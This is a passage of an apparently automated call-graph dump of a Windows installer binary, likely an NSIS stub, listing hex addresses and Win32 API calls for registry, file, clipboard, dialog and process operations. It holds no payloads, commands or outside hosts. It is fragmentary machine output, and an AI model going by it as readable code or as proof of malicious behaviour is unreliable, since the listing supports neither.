4055d6 3395->3399 3400 405436 ShowWindow 3396->3400 3402 405443 3396->3402 3397->3384 3398 40547b SendMessageW SendMessageW 3397->3398 3398->3384 3401 4055f2 SendMessageW 3399->3401 3400->3402 3401->3401 3403 40560f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3401->3403 3411 404149 SendMessageW 3402->3411 3405 405634 SendMessageW 3403->3405 3405->3405 3406 40565d GlobalUnlock SetClipboardData CloseClipboard 3405->3406 3406->3384 3407->3368 3409 406072 18 API calls 3408->3409 3410 40411f SetDlgItemTextW 3409->3410 3410->3393 3411->3397 3412->3371 3414 4040f4 3413->3414 3415 4040fa SendMessageW 3413->3415 3414->3415 3415->3370 3417 40421c 3416->3417 3418 404193 GetWindowLongW 3416->3418 3417->3384 3418->3417 3419 4041a4 3418->3419 3420 4041b3 GetSysColor 3419->3420 3421 4041b6 3419->3421 3420->3421 3422 4041c6 SetBkMode 3421->3422 3423 4041bc SetTextColor 3421->3423 3424 4041e4 3422->3424 3425 4041de GetSysColor 3422->3425 3423->3422 3426 4041f5 3424->3426 3427 4041eb SetBkColor 3424->3427 3425->3424 3426->3417 3428 404208 DeleteObject 3426->3428 3429 40420f CreateBrushIndirect 3426->3429 3427->3426 3428->3429 3429->3417 3882 40226e 3883 402275 3882->3883 3887 402288 3882->3887 3884 406072 18 API calls 3883->3884 3885 402282 3884->3885 3886 405795 MessageBoxIndirectW 3885->3886 3886->3887 3888 4014f1 SetForegroundWindow 3889 402a4c 3888->3889 3890 401673 3891 402bbf 18 API calls 3890->3891 3892 40167a 3891->3892 3893 402bbf 18 API calls 3892->3893 3894 401683 3893->3894 3895 402bbf 18 API calls 3894->3895 3896 40168c MoveFileW 3895->3896 3897 401698 3896->3897 3898 40169f 3896->3898 3899 401423 25 API calls 3897->3899 3900 406393 2 API calls 3898->3900 3902 4021e1 3898->3902 3899->3902 3901 4016ae 3900->3901 3901->3902 3903 405ef1 38 API calls 3901->3903 3903->3897 3904 401cfa GetDlgItem GetClientRect 3905 402bbf 18 API calls 3904->3905 3906 401d2c LoadImageW SendMessageW 3905->3906 3907 401d4a DeleteObject 3906->3907 3908 402a4c 3906->3908 3907->3908 3517 40237b 3518 402381 3517->3518 3519 402bbf 18 API calls 3518->3519 3520 402393 3519->3520 3521 402bbf 18 API calls 3520->3521 3522 40239d RegCreateKeyExW 3521->3522 3523 4023c7 3522->3523 3524 402a4c 3522->3524 3525 4023e2 3523->3525 3526 402bbf 18 API calls 3523->3526 3527 4023ee 3525->3527 3529 402ba2 18 API calls 3525->3529 3528 4023d8 lstrlenW 3526->3528 3530 402409 RegSetValueExW 3527->3530 3531 403027 32 API calls 3527->3531 3528->3525 3529->3527 3532 40241f RegCloseKey 3530->3532 3531->3530 3532->3524 3909 4027fb 3910 402bbf 18 API calls 3909->3910 3911 402802 FindFirstFileW 3910->3911 3912 40282a 3911->3912 3916 402815 3911->3916 3914 402833 3912->3914 3917 405f97 wsprintfW 3912->3917 3918 406050 lstrcpynW 3914->3918 3917->3914 3918->3916 3919 4014ff 3920 401507 3919->3920 3921 40151a 3919->3921 3922 402ba2 18 API calls 3920->3922 3922->3921 3923 401000 3924 401037 BeginPaint GetClientRect 3923->3924 3926 40100c DefWindowProcW 3923->3926 3927 4010f3 3924->3927 3928 401179 3926->3928 3929 401073 CreateBrushIndirect FillRect DeleteObject 3927->3929 3930 4010fc 3927->3930 3929->3927 3931 401102 CreateFontIndirectW 3930->3931 3932 401167 EndPaint 3930->3932 3931->3932 3933 401112 6 API calls 3931->3933 3932->3928 3933->3932 3934 401904 3935 40193b 3934->3935 3936 402bbf 18 API calls 3935->3936 3937 401940 3936->3937 3938 405841 69 API calls 3937->3938 3939 401949 3938->3939 3940 402d04 3941 402d16 SetTimer 3940->3941 3942 402d2f 3940->3942 3941->3942 3943 402d84 3942->3943 3944 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3942->3944 3944->3943 3945 404905 3946 404931 3945->3946 3947 404915 3945->3947 3949 404964 3946->3949 3950 404937 SHGetPathFromIDListW 3946->3950 3956 405779 GetDlgItemTextW 3947->3956 3952 40494e SendMessageW 3950->3952 3953 404947 3950->3953 3951 404922 SendMessageW 3951->3946 3952->3949 3954 40140b 2 API calls 3953->3954 3954->3952 3956->3951 3957 402786 3958 4029f7 3957->3958 3959 40278d 3957->3959 3960 402ba2 18 API calls 3959->3960 3961 402798 3960->3961 3962 40279f SetFilePointer 3961->3962 3962->3958 3963 4027af 3962->3963 3965 405f97 wsprintfW 3963->3965 3965->3958 3966 401907 3967 402bbf 18 API calls 3966->3967 3968 40190e 3967->3968 3969 405795 MessageBoxIndirectW 3968->3969 3970 401917 3969->3970 3330 401e08 3331 402bbf 18 API calls 3330->3331 3332 401e0e 3331->3332 3333 402bbf 18 API calls 3332->3333 3334 401e17 3333->3334 3335 402bbf 18 API calls 3334->3335 3336 401e20 3335->3336 3337 402bbf 18 API calls 3336->3337 3338 401e29 3337->3338 3339 401423 25 API calls 3338->3339 3340 401e30 ShellExecuteW 3339->3340 3341 401e61 3340->3341 3976 401a15 3977 402bbf 18 API calls 3976->3977 3978 401a1e ExpandEnvironmentStringsW 3977->3978 3979 401a32 3978->3979 3981 401a45 3978->3981 3980 401a37 lstrcmpW 3979->3980 3979->3981 3980->3981 3982 402515 3983 402bbf 18 API calls 3982->3983 3984 40251c 3983->3984 3987 405c25 GetFileAttributesW CreateFileW 3984->3987 3986 402528 3987->3986 3988 402095 3989 402bbf 18 API calls 3988->3989 3990 40209c 3989->3990 3991 402bbf 18 API calls 3990->3991 3992 4020a6 3991->3992 3993 402bbf 18 API calls 3992->3993 3994 4020b0 3993->3994 3995 402bbf 18 API calls 3994->3995 3996 4020ba 3995->3996 3997 402bbf 18 API calls 3996->3997 3999 4020c4 3997->3999 3998 402103 CoCreateInstance 4003 402122 3998->4003 3999->3998 4000 402bbf 18 API calls 3999->4000 4000->3998 4001 401423 25 API calls 4002 4021e1 4001->4002 4003->4001 4003->4002 4004 401b16 4005 402bbf 18 API calls 4004->4005 4006 401b1d 4005->4006 4007 402ba2 18 API calls 4006->4007 4008 401b26 wsprintfW 4007->4008 4009 402a4c 4008->4009 3534 40159b 3535 402bbf 18 API calls 3534->3535 3536 4015a2 SetFileAttributesW 3535->3536 3537 4015b4 3536->3537 3619 40229d 3620 4022a5 3619->3620 3621 4022ab 3619->3621 3622 402bbf 18 API calls 3620->3622 3623 4022b9 3621->3623 3624 402bbf 18 API calls 3621->3624 3622->3621 3625 402bbf 18 API calls 3623->3625 3627 4022c7 3623->3627 3624->3623 3625->3627 3626 402bbf 18 API calls 3628 4022d0 WritePrivateProfileStringW 3626->3628 3627->3626 4010 401f1d 4011 402bbf 18 API calls 4010->4011 4012 401f24 4011->4012 4013 40642a 5 API calls 4012->4013 4014 401f33 4013->4014 4015 401f4f GlobalAlloc 4014->4015 4018 401fb7 4014->4018 4016 401f63 4015->4016 4015->4018 4017 40642a 5 API calls 4016->4017 4019 401f6a 4017->4019 4020 40642a 5 API calls 4019->4020 4021 401f74 4020->4021 4021->4018 4025 405f97 wsprintfW 4021->4025 4023 401fa9 4026 405f97 wsprintfW 4023->4026 4025->4023 4026->4018 3629 40249e 3630 402cc9 19 API calls 3629->3630 3631 4024a8 3630->3631 3632 402ba2 18 API calls 3631->3632 3633 4024b1 3632->3633 3634 4024d5 RegEnumValueW 3633->3634 3635 4024c9 RegEnumKeyW 3633->3635 3637 40281e 3633->3637 3636 4024ee RegCloseKey 3634->3636 3634->3637 3635->3636 3636->3637 4027 40149e 4028 402288 4027->4028 4029 4014ac PostQuitMessage 4027->4029 4029->4028 3668 40231f 3669 402324 3668->3669 3670 40234f 3668->3670 3671 402cc9 19 API calls 3669->3671 3672 402bbf 18 API calls 3670->3672 3673 40232b 3671->3673 3674 402356 3672->3674 3675 402335 3673->3675 3679 40236c 3673->3679 3680 402bff RegOpenKeyExW 3674->3680 3676 402bbf 18 API calls 3675->3676 3677 40233c RegDeleteValueW RegCloseKey 3676->3677 3677->3679 3681 402c93 3680->3681 3688 402c2a 3680->3688 3681->3679 3682 402c50 RegEnumKeyW 3683 402c62 RegCloseKey 3682->3683 3682->3688 3685 40642a 5 API calls 3683->3685 3684 402c87 RegCloseKey 3689 402c76 3684->3689 3687 402c72 3685->3687 3686 402bff 5 API calls 3686->3688 3687->3689 3690 402ca2 RegDeleteKeyW 3687->3690 3688->3682 3688->3683 3688->3684 3688->3686 3689->3681 3690->3689 2819 4032a0 SetErrorMode GetVersion 2820 4032d5 2819->2820 2821 4032db 2819->2821 2822 40642a 5 API calls 2820->2822 2907 4063ba GetSystemDirectoryW 2821->2907 2822->2821 2824 4032f1 lstrlenA 2824->2821 2825 403301 2824->2825 2910 40642a GetModuleHandleA 2825->2910 2828 40642a 5 API calls 2829 403310 #17 OleInitialize SHGetFileInfoW 2828->2829 2916 406050 lstrcpynW 2829->2916 2831 40334d GetCommandLineW 2917 406050 lstrcpynW 2831->2917 2833 40335f GetModuleHandleW 2834 403377 2833->2834 2918 405a31 2834->2918 2837 4034b0 GetTempPathW 2922 40326f 2837->2922 2839 4034c8 2840 403522 DeleteFileW 2839->2840 2841 4034cc GetWindowsDirectoryW lstrcatW 2839->2841 2932 402dee GetTickCount GetModuleFileNameW 2840->2932 2842 40326f 12 API calls 2841->2842 2845 4034e8 2842->2845 2843 405a31 CharNextW 2846 40339f 2843->2846 2845->2840 2847 4034ec GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2845->2847 2846->2843 2851 40349b 2846->2851 2853 403499 2846->2853 2852 40326f 12 API calls 2847->2852 2848 4035ed ExitProcess OleUninitialize 2849 403723 2848->2849 2850 403603 2848->2850 2860 4037a7 ExitProcess 2849->2860 2861 40372b GetCurrentProcess OpenProcessToken 2849->2861 3033 405795 2850->3033 3016 406050 lstrcpynW 2851->3016 2862 40351a 2852->2862 2853->2837 2854 4035d9 2960 403899 2854->2960 2855 403536 2855->2848 2855->2854 2857 405a31 CharNextW 2855->2857 2872 403555 2857->2872 2866 403743 LookupPrivilegeValueW AdjustTokenPrivileges 2861->2866 2867 403777 2861->2867 2862->2840 2862->2848 2863 4035e9 2863->2848 2866->2867 2868 40642a 5 API calls 2867->2868 2871 40377e 2868->2871 2869 4035b3 3017 405b0c 2869->3017 2870 403619 3037 405718 2870->3037 2875 403793 ExitWindowsEx 2871->2875 2876 4037a0 2871->2876 2872->2869 2872->2870 2875->2860 2875->2876 3075 40140b 2876->3075 2880 40363a lstrcatW lstrcmpiW 2880->2848 2882 403656 2880->2882 2881 40362f lstrcatW 2881->2880 2884 403662 2882->2884 2885 40365b 2882->2885 3045 4056fb CreateDirectoryW 2884->3045 3040 40567e CreateDirectoryW 2885->3040 2886 4035ce 3032 406050 lstrcpynW 2886->3032 2890 403667 SetCurrentDirectoryW 2892 403682 2890->2892 2893 403677 2890->2893 3049 406050 lstrcpynW 2892->3049 3048 406050 lstrcpynW 2893->3048 2898 4036ce CopyFileW 2904 403690 2898->2904 2899 403717 2900 405ef1 38 API calls 2899->2900 2902 40371e 2900->2902 2902->2848 2903 406072 18 API calls 2903->2904 2904->2899 2904->2903 2906 403702 CloseHandle 2904->2906 3050 406072 2904->3050 3068 405ef1 MoveFileExW 2904->3068 3072 405730 CreateProcessW 2904->3072 2906->2904 2908 4063dc wsprintfW LoadLibraryExW 2907->2908 2908->2824 2911 406450 GetProcAddress 2910->2911 2912 406446 2910->2912 2914 403309 2911->2914 2913 4063ba 3 API calls 2912->2913 2915 40644c 2913->2915 2914->2828 2915->2911 2915->2914 2916->2831 2917->2833 2919 405a37 2918->2919 2920 403386 CharNextW 2919->2920 2921 405a3e CharNextW 2919->2921 2920->2837 2920->2846 2921->2919 3078 4062e4 2922->3078 2924 403285 2924->2839 2925 40327b 2925->2924 3087 405a04 lstrlenW CharPrevW 2925->3087 2928 4056fb 2 API calls 2929 403293 2928->2929 3090 405c54 2929->3090 3094 405c25 GetFileAttributesW CreateFileW 2932->3094 2934 402e2e 2954 402e3e 2934->2954 3095 406050 lstrcpynW 2934->3095 2936 402e54 3096 405a50 lstrlenW 2936->3096 2940 402e65 GetFileSize 2941 402f61 2940->2941 2959 402e7c 2940->2959 3101 402d8a 2941->3101 2943 402f6a 2945 402f9a GlobalAlloc 2943->2945 2943->2954 3136 403258 SetFilePointer 2943->3136 3112 403258 SetFilePointer 2945->3112 2946 402fcd 2951 402d8a 6 API calls 2946->2951 2949 402f83 2952 403242 ReadFile 2949->2952 2950 402fb5 3113 403027 2950->3113 2951->2954 2955 402f8e 2952->2955 2954->2855 2955->2945 2955->2954 2956 402d8a 6 API calls 2956->2959 2957 402fc1 2957->2954 2957->2957 2958 402ffe SetFilePointer 2957->2958 2958->2954 2959->2941 2959->2946 2959->2954 2959->2956 3133 403242 2959->3133 2961 40642a 5 API calls 2960->2961 2962 4038ad 2961->2962 2963 4038b3 2962->2963 2964 4038c5 2962->2964 3173 405f97 wsprintfW 2963->3173 3174 405f1d RegOpenKeyExW 2964->3174 2968 403914 lstrcatW 2969 4038c3 2968->2969 3157 403b6f 2969->3157 2970 405f1d 3 API calls 2970->2968 2973 405b0c 18 API calls 2974 403946 2973->2974 2975 4039da 2974->2975 2978 405f1d 3 API calls 2974->2978 2976 405b0c 18 API calls 2975->2976 2977 4039e0 2976->2977 2980 4039f0 LoadImageW 2977->2980 2981 406072 18 API calls 2977->2981 2979 403978 2978->2979 2979->2975 2984 403999 lstrlenW 2979->2984 2988 405a31 CharNextW 2979->2988 2982 403a96 2980->2982 2983 403a17 RegisterClassW 2980->2983 2981->2980 2987 40140b 2 API calls 2982->2987 2985 403aa0 2983->2985 2986 403a4d SystemParametersInfoW CreateWindowExW 2983->2986 2989 4039a7 lstrcmpiW 2984->2989 2990 4039cd 2984->2990 2985->2863 2986->2982 2991 403a9c 2987->2991 2992 403996 2988->2992 2989->2990 2993 4039b7 GetFileAttributesW 2989->2993 2994 405a04 3 API calls 2990->2994 2991->2985 2996 403b6f 19 API calls 2991->2996 2992->2984 2995 4039c3 2993->2995 2997 4039d3 2994->2997 2995->2990 2998 405a50 2 API calls 2995->2998 2999 403aad 2996->2999 3179 406050 lstrcpynW 2997->3179 2998->2990 3001 403ab9 ShowWindow 2999->3001 3002 403b3c 2999->3002 3004 4063ba 3 API calls 3001->3004 3166 405282 OleInitialize 3002->3166 3005 403ad1 3004->3005 3007 403adf GetClassInfoW 3005->3007 3009 4063ba 3 API calls 3005->3009 3006 403b42 3008 403b5e 3006->3008 3013 403b46 3006->3013 3011 403af3 GetClassInfoW RegisterClassW 3007->3011 3012 403b09 DialogBoxParamW 3007->3012 3010 40140b 2 API calls 3008->3010 3009->3007 3010->2985 3011->3012 3014 40140b 2 API calls 3012->3014 3013->2985 3015 40140b 2 API calls 3013->3015 3014->2985 3015->2985 3016->2853 3188 406050 lstrcpynW 3017->3188 3019 405b1d 3189 405aaf CharNextW CharNextW 3019->3189 3022 4035bf 3022->2848 3031 406050 lstrcpynW 3022->3031 3023 4062e4 5 API calls 3029 405b33 3023->3029 3024 405b64 lstrlenW 3025 405b6f 3024->3025 3024->3029 3026 405a04 3 API calls 3025->3026 3028 405b74 GetFileAttributesW 3026->3028 3028->3022 3029->3022 3029->3024 3030 405a50 2 API calls 3029->3030 3195 406393 FindFirstFileW 3029->3195 3030->3024 3031->2886 3032->2854 3034 4057aa 3033->3034 3035 403611 ExitProcess 3034->3035 3036 4057be MessageBoxIndirectW 3034->3036 3036->3035 3038 40642a 5 API calls 3037->3038 3039 40361e lstrcatW 3038->3039 3039->2880 3039->2881 3041 403660 3040->3041 3042 4056cf GetLastError 3040->3042 3041->2890 3042->3041 3043 4056de SetFileSecurityW 3042->3043 3043->3041 3044 4056f4 GetLastError 3043->3044 3044->3041 3046 40570b 3045->3046 3047 40570f GetLastError 3045->3047 3046->2890 3047->3046 3048->2892 3049->2904 3053 40607f 3050->3053 3051 4062ca 3052 4036c1 DeleteFileW 3051->3052 3200 406050 lstrcpynW 3051->3200 3052->2898 3052->2904 3053->3051 3055 406132 GetVersion 3053->3055 3056 406298 lstrlenW 3053->3056 3059 406072 10 API calls 3053->3059 3060 405f1d 3 API calls 3053->3060 3061 4061ad GetSystemDirectoryW 3053->3061 3062 4061c0 GetWindowsDirectoryW 3053->3062 3063 4062e4 5 API calls 3053->3063 3064 4061f4 SHGetSpecialFolderLocation 3053->3064 3065 406072 10 API calls 3053->3065 3066 406239 lstrcatW 3053->3066 3198 405f97 wsprintfW 3053->3198 3199 406050 lstrcpynW 3053->3199 3055->3053 3056->3053 3059->3056 3060->3053 3061->3053 3062->3053 3063->3053 3064->3053 3067 40620c SHGetPathFromIDListW CoTaskMemFree 3064->3067 3065->3053 3066->3053 3067->3053 3069 405f12 3068->3069 3070 405f05 3068->3070 3069->2904 3201 405d7f lstrcpyW 3070->3201 3073 405763 CloseHandle 3072->3073 3074 40576f 3072->3074 3073->3074 3074->2904 3076 401389 2 API calls 3075->3076 3077 401420 3076->3077 3077->2860 3084 4062f1 3078->3084 3079 406367 3080 40636c CharPrevW 3079->3080 3082 40638d 3079->3082 3080->3079 3081 40635a CharNextW 3081->3079 3081->3084 3082->2925 3083 405a31 CharNextW 3083->3084 3084->3079 3084->3081 3084->3083 3085 406346 CharNextW 3084->3085 3086 406355 CharNextW 3084->3086 3085->3084 3086->3081 3088 405a20 lstrcatW 3087->3088 3089 40328d 3087->3089 3088->3089 3089->2928 3091 405c61 GetTickCount GetTempFileNameW 3090->3091 3092 40329e 3091->3092 3093 405c97 3091->3093 3092->2839 3093->3091 3093->3092 3094->2934 3095->2936 3097 405a5e 3096->3097 3098 402e5a 3097->3098 3099 405a64 CharPrevW 3097->3099 3100 406050 lstrcpynW 3098->3100 3099->3097 3099->3098 3100->2940 3102 402d93 3101->3102 3103 402dab 3101->3103 3104 402da3 3102->3104 3105 402d9c DestroyWindow 3102->3105 3106 402db3 3103->3106 3107 402dbb GetTickCount 3103->3107 3104->2943 3105->3104 3137 406466 3106->3137 3109 402dc9 CreateDialogParamW ShowWindow 3107->3109 3110 402dec 3107->3110 3109->3110 3110->2943 3112->2950 3114 403040 3113->3114 3115 40306e 3114->3115 3154 403258 SetFilePointer 3114->3154 3116 403242 ReadFile 3115->3116 3118 403079 3116->3118 3119 4031db 3118->3119 3120 40308b GetTickCount 3118->3120 3122 4031c5 3118->3122 3121 40321d 3119->3121 3126 4031df 3119->3126 3120->3122 3129 4030da 3120->3129 3123 403242 ReadFile 3121->3123 3122->2957 3123->3122 3124 403242 ReadFile 3124->3129 3125 403242 ReadFile 3125->3126 3126->3122 3126->3125 3127 405cd7 WriteFile 3126->3127 3127->3126 3128 403130 GetTickCount 3128->3129 3129->3122 3129->3124 3129->3128 3130 403155 MulDiv wsprintfW 3129->3130 3152 405cd7 WriteFile 3129->3152 3141 4051af 3130->3141 3155 405ca8 ReadFile 3133->3155 3136->2949 3138 406483 PeekMessageW 3137->3138 3139 402db9 3138->3139 3140 406479 DispatchMessageW 3138->3140 3139->2943 3140->3138 3142 4051ca 3141->3142 3151 40526c 3141->3151 3143 4051e6 lstrlenW 3142->3143 3144 406072 18 API calls 3142->3144 3145 4051f4 lstrlenW 3143->3145 3146 40520f 3143->3146 3144->3143 3147 405206 lstrcatW 3145->3147 3145->3151 3148 405222 3146->3148 3149 405215 SetWindowTextW 3146->3149 3147->3146 3150 405228 SendMessageW SendMessageW SendMessageW 3148->3150 3148->3151 3149->3148 3150->3151 3151->3129 3153 405cf5 3152->3153 3153->3129 3154->3115 3156 403255 3155->3156 3156->2959 3158 403b83 3157->3158 3180 405f97 wsprintfW 3158->3180 3160 403bf4 3161 406072 18 API calls 3160->3161 3162 403c00 SetWindowTextW 3161->3162 3163 403924 3162->3163 3164 403c1c 3162->3164 3163->2973 3164->3163 3165 406072 18 API calls 3164->3165 3165->3164 3181 404160 3166->3181 3168 4052cc 3169 404160 SendMessageW 3168->3169 3171 4052de OleUninitialize 3169->3171 3170 4052a5 3170->3168 3184 401389 3170->3184 3171->3006 3173->2969 3175 4038f5 3174->3175 3176 405f51 RegQueryValueExW 3174->3176 3175->2968 3175->2970 3178 405f72 RegCloseKey 3176->3178 3178->3175 3179->2975 3180->3160 3182 404178 3181->3182 3183 404169 SendMessageW 3181->3183 3182->3170 3183->3182 3186 401390 3184->3186 3185 4013fe 3185->3170 3186->3185 3187 4013cb MulDiv SendMessageW 3186->3187 3187->3186 3188->3019 3190 405acc 3189->3190 3191 405ade 3189->3191 3190->3191 3192 405ad9 CharNextW 3190->3192 3193 405a31 CharNextW 3191->3193 3194 405b02 3191->3194 3192->3194 3193->3191 3194->3022 3194->3023 3196 4063b4 3195->3196 3197 4063a9 FindClose 3195->3197 3196->3029 3197->3196 3198->3053 3199->3053 3200->3052 3202 405da7 3201->3202 3203 405dcd GetShortPathNameW 3201->3203 3228 405c25 GetFileAttributesW CreateFileW 3202->3228 3205 405de2 3203->3205 3206 405eec 3203->3206 3205->3206 3208 405dea wsprintfA 3205->3208 3206->3069 3207 405db1 CloseHandle GetShortPathNameW 3207->3206 3209 405dc5 3207->3209 3210 406072 18 API calls 3208->3210 3209->3203 3209->3206 3211 405e12 3210->3211 3229 405c25 GetFileAttributesW CreateFileW 3211->3229 3213 405e1f 3213->3206 3214 405e2e GetFileSize GlobalAlloc 3213->3214 3215 405e50 3214->3215 3216 405ee5 CloseHandle 3214->3216 3217 405ca8 ReadFile 3215->3217 3216->3206 3218 405e58 3217->3218 3218->3216 3230 405b8a lstrlenA 3218->3230 3221 405e83 3223 405b8a 4 API calls 3221->3223 3222 405e6f lstrcpyA 3224 405e91 3222->3224 3223->3224 3225 405ec8 SetFilePointer 3224->3225 3226 405cd7 WriteFile 3225->3226 3227 405ede GlobalFree 3226->3227 3227->3216 3228->3207 3229->3213 3231 405bcb lstrlenA 3230->3231 3232 405bd3 3231->3232 3233 405ba4 lstrcmpiA 3231->3233 3232->3221 3232->3222 3233->3232 3234 405bc2 CharNextA 3233->3234 3234->3231 4030 405123 4031 405133 4030->4031 4032 405147 4030->4032 4033 405190 4031->4033 4034 405139 4031->4034 4035 40514f IsWindowVisible 4032->4035 4041 405166 4032->4041 4036 405195 CallWindowProcW 4033->4036 4037 404160 SendMessageW 4034->4037 4035->4033 4038 40515c 4035->4038 4039 405143 4036->4039 4037->4039 4043 404a79 SendMessageW 4038->4043 4041->4036 4048 404af9 4041->4048 4044 404ad8 SendMessageW 4043->4044 4045 404a9c GetMessagePos ScreenToClient SendMessageW 4043->4045 4046 404ad0 4044->4046 4045->4046 4047 404ad5 4045->4047 4046->4041 4047->4044 4057 406050 lstrcpynW 4048->4057 4050 404b0c 4058 405f97 wsprintfW 4050->4058 4052 404b16 4053 40140b 2 API calls 4052->4053 4054 404b1f 4053->4054 4059 406050 lstrcpynW 4054->4059 4056 404b26 4056->4033 4057->4050 4058->4052 4059->4056 4060 401ca3 4061 402ba2 18 API calls 4060->4061 4062 401ca9 IsWindow 4061->4062 4063 401a05 4062->4063 4064 402a27 SendMessageW 4065 402a41 InvalidateRect 4064->4065 4066 402a4c 4064->4066 4065->4066 4067 404228 lstrcpynW lstrlenW 3342 40242a 3353 402cc9 3342->3353 3344 402434 3345 402bbf 18 API calls 3344->3345 3346 40243d 3345->3346 3347 402448 RegQueryValueExW 3346->3347 3352 40281e 3346->3352 3348 40246e RegCloseKey 3347->3348 3349 402468 3347->3349 3348->3352 3349->3348 3357 405f97 wsprintfW 3349->3357 3354 402bbf 18 API calls 3353->3354 3355 402ce2 3354->3355 3356 402cf0 RegOpenKeyExW 3355->3356 3356->3344 3357->3348 4068 404b2b GetDlgItem GetDlgItem 4069 404b7d 7 API calls 4068->4069 4077 404d96 4068->4077 4070 404c20 DeleteObject 4069->4070 4071 404c13 SendMessageW 4069->4071 4072 404c29 4070->4072 4071->4070 4074 404c60 4072->4074 4076 406072 18 API calls 4072->4076 4073 404e7a 4075 404f26 4073->4075 4079 404d89 4073->4079 4085 404ed3 SendMessageW 4073->4085 4078 404114 19 API calls 4074->4078 4080 404f30 SendMessageW 4075->4080 4081 404f38 4075->4081 4082 404c42 SendMessageW SendMessageW 4076->4082 4077->4073 4088 404a79 5 API calls 4077->4088 4100 404e07 4077->4100 4083 404c74 4078->4083 4086 40417b 8 API calls 4079->4086 4080->4081 4092 404f51 4081->4092 4093 404f4a ImageList_Destroy 4081->4093 4097 404f61 4081->4097 4082->4072 4084 404114 19 API calls 4083->4084 4101 404c82 4084->4101 4085->4079 4090 404ee8 SendMessageW 4085->4090 4091 40511c 4086->4091 4087 404e6c SendMessageW 4087->4073 4088->4100 4089 4050d0 4089->4079 4098 4050e2 ShowWindow GetDlgItem ShowWindow 4089->4098 4096 404efb 4090->4096 4094 404f5a GlobalFree 4092->4094 4092->4097 4093->4092 4094->4097 4095 404d57 GetWindowLongW SetWindowLongW 4099 404d70 4095->4099 4106 404f0c SendMessageW 4096->4106 4097->4089 4112 404af9 4 API calls 4097->4112 4113 404f9c 4097->4113 4098->4079 4102 404d76 ShowWindow 4099->4102 4103 404d8e 4099->4103 4100->4073 4100->4087 4101->4095 4105 404cd2 SendMessageW 4101->4105 4107 404d51 4101->4107 4110 404d0e SendMessageW 4101->4110 4111 404d1f SendMessageW 4101->4111 4119 404149 SendMessageW 4102->4119 4120 404149 SendMessageW 4103->4120 4105->4101 4106->4075 4107->4095 4107->4099 4108 404fe0 4114 4050a6 InvalidateRect 4108->4114 4118 405054 SendMessageW SendMessageW 4108->4118 4110->4101 4111->4101 4112->4113 4113->4108 4116 404fca SendMessageW 4113->4116 4114->4089 4115 4050bc 4114->4115 4121 404a34 4115->4121 4116->4108 4118->4108 4119->4079 4120->4077 4124 40496b 4121->4124 4123 404a49 4123->4089 4125 404984 4124->4125 4126 406072 18 API calls 4125->4126 4127 4049e8 4126->4127 4128 406072 18 API calls 4127->4128 4129 4049f3 4128->4129 4130 406072 18 API calls 4129->4130 4131 404a09 lstrlenW wsprintfW SetDlgItemTextW 4130->4131 4131->4123 3358 40172d 3359 402bbf 18 API calls 3358->3359 3360 401734 SearchPathW 3359->3360 3361 40174f 3360->3361 4132 4045af 4133 4045db 4132->4133 4134 4045ec 4132->4134 4193 405779 GetDlgItemTextW 4133->4193 4135 4045f8 GetDlgItem 4134->4135 4143 404657 4134->4143 4137 40460c 4135->4137 4141 404620 SetWindowTextW 4137->4141 4146 405aaf 4 API calls 4137->4146 4138 40473b 4142 4048ea 4138->4142 4195 405779 GetDlgItemTextW 4138->4195 4139 4045e6 4140 4062e4 5 API calls 4139->4140 4140->4134 4147 404114 19 API calls 4141->4147 4145 40417b 8 API calls 4142->4145 4143->4138 4143->4142 4148 406072 18 API calls 4143->4148 4150 4048fe 4145->4150 4151 404616 4146->4151 4152 40463c 4147->4152 4153 4046cb SHBrowseForFolderW 4148->4153 4149 40476b 4154 405b0c 18 API calls 4149->4154 4151->4141 4158 405a04 3 API calls 4151->4158 4155 404114 19 API calls 4152->4155 4153->4138 4156 4046e3 CoTaskMemFree 4153->4156 4157 404771 4154->4157 4159 40464a 4155->4159 4160 405a04 3 API calls 4156->4160 4196 406050 lstrcpynW 4157->4196 4158->4141 4194 404149 SendMessageW 4159->4194 4162 4046f0 4160->4162 4166 404727 SetDlgItemTextW 4162->4166 4169 406072 18 API calls 4162->4169 4164 404788 4168 40642a 5 API calls 4164->4168 4165 404650 4167 40642a 5 API calls 4165->4167 4166->4138 4167->4143 4175 40478f 4168->4175 4170 40470f lstrcmpiW 4169->4170 4170->4166 4172 404720 lstrcatW 4170->4172 4171 4047d0 4197 406050 lstrcpynW 4171->4197 4172->4166 4174 4047d7 4176 405aaf 4 API calls 4174->4176 4175->4171 4180 405a50 2 API calls 4175->4180 4181 404828 4175->4181 4177 4047dd GetDiskFreeSpaceW 4176->4177 4179 404801 MulDiv 4177->4179 4177->4181 4179->4181 4180->4175 4182 404899 4181->4182 4184 404a34 21 API calls 4181->4184 4183 4048bc 4182->4183 4186 40140b 2 API calls 4182->4186 4198 404136 KiUserCallbackDispatcher 4183->4198 4185 404886 4184->4185 4187 40489b SetDlgItemTextW 4185->4187 4188 40488b 4185->4188 4186->4183 4187->4182 4190 40496b 21 API calls 4188->4190 4190->4182 4191 4048d8 4191->4142 4199 404544 4191->4199 4193->4139 4194->4165 4195->4149 4196->4164 4197->4174 4198->4191 4200 404552 4199->4200 4201 404557 SendMessageW 4199->4201 4200->4201 4201->4142 4202 4042b1 4203 4042c9 4202->4203 4206 4043e3 4202->4206 4207 404114 19 API calls 4203->4207 4204 40444d 4205 404457 GetDlgItem 4204->4205 4208 40451f 4204->4208 4209 404471 4205->4209 4210 4044e0 4205->4210 4206->4204 4206->4208 4211 40441e GetDlgItem SendMessageW 4206->4211 4212 404330 4207->4212 4213 40417b 8 API calls 4208->4213 4209->4210 4214 404497 6 API calls 4209->4214 4210->4208 4215 4044f2 4210->4215 4233 404136 KiUserCallbackDispatcher 4211->4233 4217 404114 19 API calls 4212->4217 4218 40451a 4213->4218 4214->4210 4219 404508 4215->4219 4220 4044f8 SendMessageW 4215->4220 4222 40433d CheckDlgButton 4217->4222 4219->4218 4224 40450e SendMessageW 4219->4224 4220->4219 4221 404448 4225 404544 SendMessageW 4221->4225 4231 404136 KiUserCallbackDispatcher 4222->4231 4224->4218 4225->4204 4226 40435b GetDlgItem 4232 404149 SendMessageW 4226->4232 4228 404371 SendMessageW 4229 404397 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4228->4229 4230 40438e GetSysColor 4228->4230 4229->4218 4230->4229 4231->4226 4232->4228 4233->4221 4234 4027b4 4235 4027ba 4234->4235 4236 4027c2 FindClose 4235->4236 4237 402a4c 4235->4237 